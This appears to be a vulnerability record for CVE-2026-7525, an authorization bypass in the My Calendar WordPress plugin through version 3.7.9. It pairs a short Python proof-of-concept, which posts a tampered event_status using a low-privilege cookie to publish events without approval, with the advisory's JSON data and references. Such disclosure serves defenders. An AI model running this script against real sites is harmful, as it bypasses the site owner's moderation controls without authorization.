CVE-2026-7525

import requests # Target configuration target_url = "http://example.com/wp-admin/admin.php?page=my-calendar-manage" attacker_cookie = "wordpress_logged_in_xxxxxxxxx=logged_in_session_string" # Low-privilege user cookie headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Cookie": attacker_cookie, "Content-Type": "application/x-www-form-urlencoded" } # Payload to bypass client-side restrictions # By default, the UI might send event_status=0 (draft). # We modify it to event_status=1 (published) to bypass the moderation workflow. payload = { "action": "mc_save_event", # The action hook for saving events "event_title": "PoC Published Event", "event_begin": "2026-05-15", "event_end": "2026-05-15", "event_status": "1", # 1 represents Published (Bypass UI restriction) "event_access": "public", "mc_nonce": "valid_nonce_value_here" # Valid nonce is required for authenticated requests } try: response = requests.post(target_url, data=payload, headers=headers) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Verify the event status on the calendar. It should be published without approval.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error occurred: {e}")

{"cve": {"id": "CVE-2026-7525", "sourceIdentifier": "[email protected]", "published": "2026-05-14T05:16:45.947", "lastModified": "2026-05-14T14:29:01.600", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The My Calendar – Accessible Event Manager plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 3.7.9. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with custom-level access and above, to bypass the moderation and approval workflow by tampering with the POST body to publish events or set other unauthorized statuses such as cancelled or private, in ways their role does not permit. While the UI correctly restricts low-privilege users to a draft-only submit button, this restriction is enforced only client-side, making it trivially bypassable by directly manipulating the POST request."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/joedolson/my-calendar/commit/98aef8fbfc6ca4cfe50aaa36761d5f1eb629dfe4", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/my-calendar/tags/3.7.4/my-calendar-event-editor.php#L2384", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/my-calendar/tags/3.7.4/my-calendar-event-editor.php#L406", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/my-calendar/tags/3.7.4/my-calendar-event-editor.php#L601", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/my-calendar/tags/3.7.9/my-calendar-event-editor.php#L2384", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/my-calendar/tags/3.7.9/my-calendar-event-editor.php#L406", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/my-calendar/tags/3.7.9/my-calendar-event-editor.php#L601", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/my-calendar/trunk/my-calendar-event-editor.php#L2384", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/my-calendar/trunk/my-calendar-event-editor.php#L406", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/my-calendar/trunk/my-calendar-event-editor.php#L601", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3527861%40my-calendar&new=3527861%40my-calendar&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3e27c0b0-c74f-47ad-b9ed-9fd6bd05d040?source=cve", "source": "[email protected]"}]}}